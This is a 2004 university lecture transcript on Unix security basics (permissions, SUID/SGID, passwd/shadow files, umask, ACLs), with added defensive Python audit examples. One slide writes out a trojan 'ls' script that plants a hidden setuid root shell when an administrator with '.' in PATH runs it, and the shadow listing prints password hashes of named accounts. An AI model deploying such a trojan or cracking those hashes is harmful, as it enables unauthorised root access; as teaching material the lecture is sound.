Lecture 4: Unix Security Basics
Transcript of Lecture 4: Unix Security Basics
Asoc. Prof. Guntis Barzdins, Asist. Girts Folkmanis
University of Latvia, Oct 8, 2004
Top UNIX Vulnerabilities
- U1 BIND Domain Name System
- U2 Remote Procedure Calls (RPC)
- U3 Apache Web Server
- U4 General UNIX Authentication: Accounts with No Passwords or Weak Passwords
- U5 Clear Text Services
- U6 Sendmail
- U7 Simple Network Management Protocol (SNMP)
- U8 Secure Shell (SSH)
- U9 Misconfiguration of Enterprise Services NIS/NFS
- U10 Open Secure Sockets Layer (SSL)
Source: http://www.sans.org/top20/#threats
Favourite TCP Ports
- 20 FTP (data)
- 21 FTP (control)
- 23 Telnet
- 25 SMTP (mail)
- 70 Gopher
- 79 Finger
- 80 HTTP (also 8000, 8001 or 8080)
- 110 POP3
- 119 NNTP (news)
- 143 IMAP
- 7-19 echo, discard, daytime, chargen, netstat
- 22 SSH
- 42 WINS
- 53 DNS
- 111 Sun RPC
- 113 identd
- 123 NTP
- 135 loc-srv/epmap (used to attack Wintel)
- 137-139 NetBIOS
- 161 SNMP
- 512-517 rexec, rlogin, rsh, talk, syslog, who
- 635 mountd (Linux)
- 2049 NFS
- 6670 DeepThroat
- 31337 BackOrifice
No system is perfectly secure, but still we need security
A number of toolkits exist that allow total amateurs to become holy terrors.
The good news is that if you can beat the popular intrusion toolkits, 90 percent of the bad guys will go bother somebody else who's less secure.
Protection
An operating system consists of a collection of objects, hardware or software.
Each object has a unique name and can be accessed through a well-defined set of operations.
Protection problem: ensure that each object is accessed only through the correct set of operations and only by those processes that are allowed to do so.
UNIX Security Basics
Permissions, UID, GID, superuser, SUID, SGID, sticky bit, umask, filesystem restrictions.
Advanced: Systrace, Veriexec, iptables, etc.
Domain Implementation in UNIX
Two domain groups: user and superuser (can do everything, UID=0).
User domain group: domain = user-id (UID). Domain switch is accomplished via the file system.
Each file has associated with it a domain bit (setuid bit = SUID bit).
When a file is executed and setuid is on, the effective user-id is set to the owner of the file being executed. When execution completes, the user-id is reset (exit() of the child process).
Subjects and Objects
Each subject (process) and object (file, socket, etc.) has a 16-bit UID.
Each object also has a 16-bit GID and each subject has one or more GIDs.
Objects have access control lists that specify read, write, and execute permissions for user, group, and world.
Super-users (uid=0 root) can do anything.
Subjects and Objects
Permission classes checked against a subject's credentials:
- UID: user (owner) permissions
- GID (primary GID + supplementary GID list): group permissions
- Others: others permissions
Objects = files (regular files and devices under /dev)
Subjects = processes (effective UID and GIDs count)
inodes
inodes contain a lot of information about a file:
- mode and type of file
- number of links to the file
- owner's UID
- owner's GID
- number of bytes in file
- times (last accessed, modified, inode changed)
- physical disk addresses (direct and indirect blocks)
- number of blocks
- access information
Unix File System (UFS) Structure
Directory: under UNIX, directories are special (OS-writable only) files. The directory file is an unsorted linked list of filenames to file inodes (attributes and location of the file on the hard disk). Directory size will always increase to be large enough to hold all the file entries. If the number of files later shrinks, the directory size WILL NOT!
Example directory file contents (inode number, filename); note that apples and aboli share inode 5, i.e. they are two names for the same file:
5 apples
4 oranges
5 aboli
2 .
7 ..
ls -l:
> ls -l foo
-rw-rw---- 1 hollingd grads 13 Jan 10 23:05 foo
Fields: permissions (-rw-rw----), link count (1), owner (hollingd), group (grads), size (13), time (Jan 10 23:05), name (foo).
File Time Attributes
Time attributes and the ls option that shows each one:
- when the file was last changed: ls -l
- when the file was created*: ls -lc
- when the file was last read (accessed): ls -ul
*actually it's the time the file status in the directory last changed (e.g. file renamed).
Types of Files
Regular files:
- binary: GIF, JPEG, executable, etc.
- text: scripts, program source code, documentation
Regular files support sequential and random access.
Types of Files (cont.)
Directory: can contain ANY kind of files.
. (dot): the special name for the current directory.
.. (dot dot): the special name for the directory above the current directory.
Device file: allows programs to communicate with hardware. Kernel modules handle device management.
Types of Files (cont.)
Device files (cont.)
Character device: accepts a stream of characters, without regard to any block structure. It is not addressable, therefore there is no seek operation.
Block device: information is stored in fixed-sized blocks. It is addressable, therefore a seek operation is possible.
Types of Files (cont.)
UNIX domain sockets (BSD): sockets that are local to a particular host and are referenced through a file system object rather than a network port. Example: X windows.
Named pipe: allows processes to communicate with each other.
Types of Files (cont.)
Hard links: linking files by reference. The system maintains a count of the number of links. Does not work across file systems.
Soft links: linking files by name. No counter is maintained. Work across file systems.
From "man ln": There are two concepts of `link' in Unix, usually called hard link and soft link. A hard link is just a name for a file. (And a file can have several names. It is deleted from disk only when the last name is removed. The number of names is given by ls(1). There is no such thing as an `original' name: all names have the same status.) A soft link (or symbolic link, or symlink) is an entirely different animal: it is a small special file that contains a pathname.
Creating a Link (soft link)
Create a link directory by typing the following command from your home directory:
% ln -s /home/faculty/ostic/prof myprof
You only need to create this link once. It will appear as a subdirectory in your home directory structure every time you log on to the system.
Disk vs. Filesystem
The entire hierarchy can actually include many disk drives; some directories can be on other computers.
/
  bin
  etc
  users
    hollid2
    scully
  tmp
  usr
Disk mount options
Override individual file permissions. A major security tool in Unix.
File permissions
Example: -rwxr--r--
File type (first character): - plain file, d directory, c character device (tty, printer), b block device (disk, CD-ROM), l symbolic link, s socket, = or p FIFO.
Access granted to owner (rwx): r read / w write / x execute.
Access granted to group members (r--).
Access granted to others (r--).
Permissions for Files
If you have read permission for a file, you can view its contents.
If you have write permission for a file, you can alter its contents.
If you have execute permission for a file, you can run the file as a program.
Permissions for Directories
If you have read permission for a directory, you can list the contents of the directory.
If you have write permission for a directory, you can create or remove files or directories inside that directory.
If you have execute permission for a directory, you can change to this directory using the cd command, or use it as part of a pathname.
SUID/SGID/sticky bits
SUID (set uid): processes are granted access to system resources based on the user who owns the file.
SGID (set gid): for a file, same as SUID except the group is affected. For a directory, files created in that directory will have their group set to the directory's group.
Sticky bit: if set on a directory, then a user may only delete files that he owns or for which he has explicit write permission granted, even when he has write access to the directory (e.g. /tmp).
File Permissions (ex: rw-r--r--)
owner: rw-, group: r--, others: r-- (r: read, w: write, x: execute)
When a process executes, it has four values related to file permission: a real user ID, an effective user ID, a real group ID and an effective group ID. When you log in, your login shell process' values are your user ID and group ID.
Effective User and Group ID
A process' effective user ID depends on who executes the process, not who owns the executable. E.g., if you run passwd (owned by root), the effective user ID is your ID, not root; then how can it update the /etc/passwd file owned by root?
Two special file permissions: set user ID and set group ID. When an executable with set user ID permission is executed, the process' effective user ID becomes that of the executable's owner; the real user ID is unaffected.
File permission of /bin/passwd is r-sr-sr-x.
Real uids
The uid of the user who started the program is used as its real uid.
The real uid affects what the program can do (e.g. create, delete files).
For example, the uid of /usr/bin/vi is root:
$ ls -alt /usr/bin/vi
lrwxrwxrwx 1 root root 20 Apr 13...
But when I use vi, its real uid is dkl (not root), so I can only edit my files.
Effective uids
Programs can change to use the effective uid, the uid of the program owner; e.g. the passwd program changes to use its effective uid (root) so that it can edit the /etc/passwd file.
The SUID bit enables this functionality.
Real and Effective Group-ids
There are also real and effective group-ids.
Usually a program uses the real group-id (i.e. the group-id of the user).
Sometimes useful to use effective group-id (i.e. group-id of program owner): e.g. software shared across teams
SGID bit enables this functionality
Sample SETUID Scenario
/dev/lp is owned by root with protection rw-------. This is used to access the printer.
/bin/lp is owned by root with rwsr-xr-x (with SETUID=1).
User A issues a print command. The shell (running with A's UID and GID) interprets the command and forks off a child process, say, P. Process P has the same UID/GID as user A. Child process P executes exec("/bin/lp", ...). Now P's domain changes to root's UID. Consequently, /dev/lp can be accessed to print. When /bin/lp terminates, so does P. The parent shell never got access to /dev/lp.
File system tips
Turning off SUID / SGID in a mounted file system: use nosuid (and nodev if possible) when mounting a remote file system or allowing users to mount floppies or CD-ROMs.
Finding SUID and SGID files:
# find / \( -local -o -prune \) \( -perm -004000 -o -perm -002000 \) -type f -print
(-xdev can be used in place of -local/-prune)
Unix Accounts and the Filesystem
Unix Accounts
To access a Unix system you need to have an account.
A Unix account includes: username and password, userid and groupid, home directory, shell.
Creating user accounts
- useradd or adduser scripts
- manually edit /etc/passwd, /etc/shadow, /etc/group; remember to lock these files while editing (vipw)
- run "passwd [user]"
- create the home directory: chown, chgrp, chmod
- copy defaults (e.g. umask) from /etc/skel, /etc/profile
username
A username is (typically) a sequence of alphanumeric characters of length no more than 8.
The username is the primary identifying attribute of your account.
The username is (usually) used as a part of the email address; the name of your home directory is usually related to your username.
password
A password is a secret string that only the user knows (not even the system knows!). When you enter your password the system calculates a hash (one-way) function and compares it to a stored string.
Passwords are (usually) no less than 8 characters long.
It's a good idea to include numbers and/or special characters (don't use an English word!).
userid
a userid is a number (a 16-bit integer) that identifies a Unix account. Each userid is unique.
It's easier (and more efficient) for the system to use a number than a string like the username.
You don't need to know your userid!
Unix Groups and groupid
Unix includes the notion of a "group" of users. A Unix group can share files and active processes. Each account is assigned a "primary" group. The groupid is a number that corresponds to this primary group. A single account can belong to many groups (but has only one primary group).
Home Directory
A home directory is a place in the file system where the account files are stored.
A directory is like a Windows folder (more on this later).
Many unix commands and applications make use of the account home directory (as a place to look for customization files).
Shell
A Shell is a unix program that provides an interactive session - a text-based user interface.
When you log in to a Unix system the program you initially interact with is your shell.
There are a number of popular shells that are available.
Popular Shells
- sh: Bourne Shell
- ksh: Korn Shell
- csh: C Shell
- bash: Bourne-Again Shell
Startup files
sh, ksh: /etc/profile (system defaults), ~/.profile
bash: ~/.bash_profile, ~/.bashrc, ~/.bash_logout
csh: ~/.cshrc, ~/.login, ~/.logout
Additional Password Security
Later versions of Unix have improved the security for password encryption as follows:
- Passwords are no longer restricted to 8 characters
- Use MD5 instead of DES; gives 128-bit output
- Use "salt"
Furthermore, the encrypted (hashed) password is removed from the /etc/passwd file and instead is placed in /etc/shadow.
Restricted access to /etc/shadow: no requirement for it to be world-readable; only readable by root.
Much more difficult to launch an off-line (dictionary) attack.
/etc/shadow contains additional password information (number of days before expiry, etc.).
passwd, shadow, group files
unix root # more /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
...
guest:x:405:100:guest:/dev/null:/dev/null
nobody:x:65534:65534:nobody:/:/bin/false
girtsf:x:1000:100::/home/girtsf:/bin/bash
dima:x:1001:100::/home/dima:/bin/bash
guntis:x:1002:100::/home/guntis:/bin/bash
students:x:1003:100::/home/students:/bin/bash
unix root #

unix root # more /etc/shadow
root:$1$VlYbWsrd$GUs2cptio.rKlGHgAMBzr.:12684:0:::::
halt:*:9797:0:::::
...
guest:*:9797:0:::::
nobody:*:9797:0:::::
girtsf:$1$u6UEWKT2$w5K28n2iAB2wNWtyPLycP1:12684:0:99999:7:::
dima:$1$BQCdIBdV$xzzlj4s8XT6L9cLAmcoV50:12684:0:99999:7:::
guntis:$1$fiJF/0BT$Py9JiQQL6icajjQVyMZ7//:12684:0:99999:7:::
students:$1$wueon8yh$nLpUpNOKr8yTYaEnEK6OJ1:12685:0:99999:7:::
unix root #

unix etc # ls -l passwd shadow group
-rw-r--r-- 1 root root  705 Sep 23 15:36 group
-rw-r--r-- 1 root root 1895 Sep 24 18:20 passwd
-rw------- 1 root root  634 Sep 24 18:22 shadow
unix etc #

unix root # more /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:girtsf
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root,girtsf
floppy::11:root
mail::12:mail
...
users::100:games,girtsf
nofiles:x:200:
qmail:x:201:
postfix:x:207:
postdrop:x:208:
smmsp:x:209:smmsp
slocate::245:
portage::250:portage
utmp:x:406:
nogroup::65533:
nobody::65534:
unix root #
Only the "wheel" group can su to root; see /etc/pam.d/.
Users and Ownership: /etc/passwd
Every file is owned by one of the system's users; identity is represented by the user-id (UID).
The password file associates UIDs with system users. Example entry:
gates:x:65:20:B. Gates:/home/gates:/bin/ksh
Fields: login name, [encrypted password], user ID, group ID, "real" name, home directory, command interpreter.
/etc/group: information about system groups. Example entry:
faculty:x:23:maria,eileen,dkl
Fields: group name, [encrypted group password], group ID, list of group members.
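As an added example (not code from the lecture), a small Python audit that parses passwd, shadow and group lines in the formats shown above and flags the conditions the lecture discusses: extra UID 0 accounts, empty password fields, hashes left in the world-readable passwd file, legacy DES hashes instead of salted MD5, and wheel membership. The sample data is constructed from the lecture's listings plus two deliberately bad accounts (toor, test) that are not in the original.

```python
# Added example, not the lecture's code. Sample files are constructed from the
# lecture's listings plus two deliberately bad accounts: toor (second UID 0)
# and test (empty password field in shadow).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
guest:x:405:100:guest:/dev/null:/dev/null
girtsf:x:1000:100::/home/girtsf:/bin/bash
toor:x:0:0::/:/bin/sh
test:x:1004:100::/home/test:/bin/bash
"""
SHADOW = """\
root:$1$VlYbWsrd$GUs2cptio.rKlGHgAMBzr.:12684:0:::::
bin:*:9797:0:::::
guest:*:9797:0:::::
girtsf:$1$u6UEWKT2$w5K28n2iAB2wNWtyPLycP1:12684:0:99999:7:::
toor:$1$VlYbWsrd$GUs2cptio.rKlGHgAMBzr.:12684:0:::::
test::12684:0:99999:7:::
"""
GROUP = """\
root::0:root
wheel::10:root,girtsf
users::100:games,girtsf
"""

def parse_colon_file(text, fields):
    """Map the first field of each non-empty ':'-separated line to a dict of the rest."""
    table = {}
    for line in text.splitlines():
        if line.strip():
            parts = line.split(":")
            table[parts[0]] = dict(zip(fields, parts[1:]))
    return table

def audit_accounts(passwd_text, shadow_text, group_text):
    """Return sorted 'check:account' strings for every weak-account condition found."""
    pw = parse_colon_file(passwd_text, ("passwd", "uid", "gid", "gecos", "home", "shell"))
    sh = parse_colon_file(shadow_text, ("hash", "changed", "min", "max", "warn", "inactive", "expire", "flag"))
    gr = parse_colon_file(group_text, ("passwd", "gid", "members"))
    findings = []
    for name, e in pw.items():
        if e["uid"] == "0" and name != "root":
            findings.append("uid0:" + name)          # any UID 0 account is a superuser
        if e["passwd"] == "x":                       # hash lives in /etc/shadow (root-only readable)
            if name not in sh:
                findings.append("noshadow:" + name)  # passwd points to shadow but no entry is there
                continue
            stored = sh[name]["hash"]
        else:                                        # hash (or nothing) still in world-readable passwd
            findings.append("inpasswd:" + name)
            stored = e["passwd"]
        if stored == "":
            findings.append("nopass:" + name)        # empty field: the account has no password at all
        elif not stored.startswith(("*", "!", "$")):
            findings.append("deshash:" + name)       # old 13-char DES crypt, not "$1$" salted MD5
    if "wheel" in gr:                                # wheel members may su to root (see /etc/pam.d/)
        findings.extend("wheel:" + m for m in gr["wheel"]["members"].split(",") if m)
    return sorted(findings)

if __name__ == "__main__":
    for finding in audit_accounts(PASSWD, SHADOW, GROUP):
        print(finding)
```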
Who is superuser?
UID of 0. Any username can be the superuser. Normal security checks and constraints are ignored for the superuser. Superuser is not for casual use.
Do not log in as superuser; use '/bin/su' with the "-" option instead.
Simple trap to steal superuser
Premise: root's PATH starts with ".".
Contents of shell script 'ls':
#!/bin/sh
cp /bin/sh ./junk/.ss
chmod 4555 ./junk/.ss
rm -f $0
exec /bin/ls ${1+"$@"}
Set a trap:
% cd
% chmod 700 .
% touch ./-f
All that is left to do is to say to the administrator: "I have a funny file in my directory I can't seem to delete."
Good root practice
unix root # which ls
/bin/ls
unix root # ls -al `which ls`
-rwxr-xr-x 1 root root 79360 Jul 18 08:03 /bin/ls
unix root #
Do not start root PATH with “.”
Logging In
To log in to a Unix machine you can either sit at the console (the computer itself) or access it via the net (using telnet, rsh, ssh, kermit, or some other remote access client). The system prompts you for your username and password. Usernames and passwords are case sensitive!
Session Startup
Once you log in, your shell will be started and it will display a prompt.
When the shell is started it looks in your home directory for some customization files. You can change the shell prompt and a bunch of other things by creating customization files (umask etc.).
Your Home Directory
Every Unix process* has a notion of the "current working directory".
Your shell (which is a process) starts with the current working directory set to your home directory.
*A process is an instance of a program that is currently running.
Interacting with the Shell
The shell prints a prompt and waits for you to type in a command.
The shell can deal with a couple of types of commands: shell internals (commands that the shell handles directly) and external programs (the shell runs a program for you).
File Types in Unix
All files are either binary (uses all characters) or text (readable characters).
Binary: directories; machine code (directly executed).
Text: source (readable programs); documents, etc.
Source: shell scripts (interpreted by the shell); programming language (interpreted or compiled).
Executable files: machine code and shell scripts. A compiler turns source into new files.
umask: Calculations (2)
If you want a file permission of 644 (by default, without manually executing chmod) on a regular file, the umask would need to be 022.
Default mode 666, umask 022, new file mode 644.
Bit level: new_mode = mode & ~umask
umask    = 000 010 010 = ----w--w- = 0022
~umask   = 111 101 101
mode     = 110 110 110 = rw-rw-rw- = 0666
new_mode = 110 100 100 = rw-r--r-- = 0644
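As an added Python example (not from the lecture), the umask rule, the ls -l rendering of the permission bits including the SUID/SGID/sticky bits, and the owner/group/others check from the earlier slides. may_access generalises the rule that only the first matching class is consulted, which is what decides the "owner has 0, group has 1" and "root with permissions 0" cases; the uid/gid values in the demo are constructed.

```python
# Added example, not the lecture's code.
import stat

def mode_to_string(mode):
    """Render the permission part of ls -l output (without the leading type character),
    showing SUID/SGID/sticky as s/t, or S/T when the matching execute bit is missing."""
    out = []
    for shift, special, letter in ((6, stat.S_ISUID, "s"), (3, stat.S_ISGID, "s"), (0, stat.S_ISVTX, "t")):
        bits = (mode >> shift) & 0o7
        r = "r" if bits & 4 else "-"
        w = "w" if bits & 2 else "-"
        if mode & special:
            x = letter if bits & 1 else letter.upper()
        else:
            x = "x" if bits & 1 else "-"
        out.append(r + w + x)
    return "".join(out)

def new_file_mode(default_mode, umask):
    """The umask rule from the slide: new_mode = mode & ~umask (666 & ~022 = 644)."""
    return default_mode & ~umask & 0o777

def may_access(mode, file_uid, file_gid, euid, gids, want):
    """Classic Unix check for a process with effective uid `euid` and group set `gids`.
    Only the FIRST matching class (owner, then group, then others) is consulted, so an
    owner whose own bits are 0 is refused even when the group bits would allow it.
    root (euid 0) bypasses the check, except that executing needs at least one x bit.
    `want` is a string of r/w/x letters."""
    need = sum({"r": 4, "w": 2, "x": 1}[c] for c in want)
    if euid == 0:
        return "x" not in want or bool(mode & 0o111)
    if euid == file_uid:
        shift = 6
    elif file_gid in gids:
        shift = 3
    else:
        shift = 0
    bits = (mode >> shift) & 0o7
    return bits & need == need

if __name__ == "__main__":
    # Constructed demo: the modes the lecture quotes for /bin/passwd, /bin/lp and /tmp.
    for m in (0o644, 0o6555, 0o4755, 0o1777):
        print(oct(m), mode_to_string(m))
    print("666 with umask 022 ->", oct(new_file_mode(0o666, 0o022)))
    print("owner 0, group 1, owner wants x:", may_access(0o010, 1000, 100, 1000, {100}, "x"))
```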
Advanced: Capabilities
For the purpose of performing permission checks, traditional Unix implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is non-zero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process's credentials (usually: effective UID, effective GID, and supplementary group list).
Starting with kernel 2.2, Linux provides an (as yet incomplete) system of capabilities, which divide the privileges traditionally associated with superuser into distinct units that can be independently enabled and disabled.
Advanced: Access Control Lists
The permissions defined by ACLs are a superset of the permissions specified by the file permission bits. The permissions defined for the file owner correspond to the permissions of the ACL_USER_OBJ entry. The permissions defined for the file group correspond to the permissions of the ACL_GROUP_OBJ entry, if the ACL has no ACL_MASK entry. If the ACL has an ACL_MASK entry, then the permissions defined for the file group correspond to the permissions of the ACL_MASK entry. The permissions defined for the other class correspond to the permissions of the ACL_OTHER_OBJ entry.
Modification of the file permission bits results in the modification of the permissions in the associated ACL entries. Modification of the permissions in the ACL entries results in the modification of the file permission bits.
Example:
user::rw-
user:lisa:rw-
group::r--
group:toolies:rw-
mask::r--
other::r--
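The acl(5) access algorithm and the ACL-to-mode-bits mapping described above, applied to the lecture's example ACL, as an added Python example (not from the lecture). The file owner "mark" and owning group "staff" are assumptions, since the example ACL does not name them.

```python
# Added example, not the lecture's code. The ACL below is the lecture's example;
# owner "mark" and owning group "staff" are assumed.
EXAMPLE_ACL = "user::rw- user:lisa:rw- group::r-- group:toolies:rw- mask::r-- other::r--"

def perm_bits(perms):
    """'rw-' -> 6, using the r=4, w=2, x=1 convention of the file permission bits."""
    return (4 if "r" in perms else 0) | (2 if "w" in perms else 0) | (1 if "x" in perms else 0)

def parse_acl(text):
    """Entries are 'tag:qualifier:perms' separated by whitespace (getfacl prints one per line)."""
    return [tuple(entry.split(":")) for entry in text.split()]

def acl_to_mode(acl_text):
    """File permission bits implied by an ACL: owner class from user::, other class from
    other::, and the group class from mask:: when present, otherwise from group::."""
    entry = {(tag, qual): perm_bits(p) for tag, qual, p in parse_acl(acl_text)}
    group_class = entry.get(("mask", ""), entry[("group", "")])
    return (entry[("user", "")] << 6) | (group_class << 3) | entry[("other", "")]

def acl_check(acl_text, who, groups, want, owner, owner_group):
    """True if a process running as user `who` with group set `groups` may perform
    `want` (r/w/x letters). Order follows acl(5): owner, named user, groups, other.
    The mask applies to everything except the user:: and other:: entries."""
    acl = parse_acl(acl_text)
    need = perm_bits(want)
    mask = next((perm_bits(p) for tag, _, p in acl if tag == "mask"), 7)
    for tag, qual, perms in acl:                        # 1. file owner, never masked
        if tag == "user" and qual == "" and who == owner:
            return perm_bits(perms) & need == need
    for tag, qual, perms in acl:                        # 2. named user entry, masked
        if tag == "user" and qual == who:
            return perm_bits(perms) & mask & need == need
    matching = [perm_bits(p) & mask for tag, qual, p in acl
                if tag == "group" and ((qual == "" and owner_group in groups)
                                       or (qual != "" and qual in groups))]
    if matching:                                        # 3. any matching group entry may grant;
        return any(bits & need == need for bits in matching)  # no fall-through to other::
    for tag, qual, perms in acl:                        # 4. everybody else
        if tag == "other":
            return perm_bits(perms) & need == need
    return False

if __name__ == "__main__":
    print("mode bits:", oct(acl_to_mode(EXAMPLE_ACL)))
    print("lisa may write:", acl_check(EXAMPLE_ACL, "lisa", {"users"}, "w", "mark", "staff"))
    print("toolies member may write:", acl_check(EXAMPLE_ACL, "bob", {"toolies"}, "w", "mark", "staff"))
```

Because mask::r-- caps the named user and named group entries, lisa and the toolies group end up with read only, exactly as the mask rule in the text describes.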
Advanced: TCP/IP Firewalls
Questions
- Maximum length of a Unix file name
- Allowed characters in a Unix file name
- What happens if the user has permissions 0 but his group has permissions 1?
- Can root edit a file with all permissions 0? Or do they first have to be changed?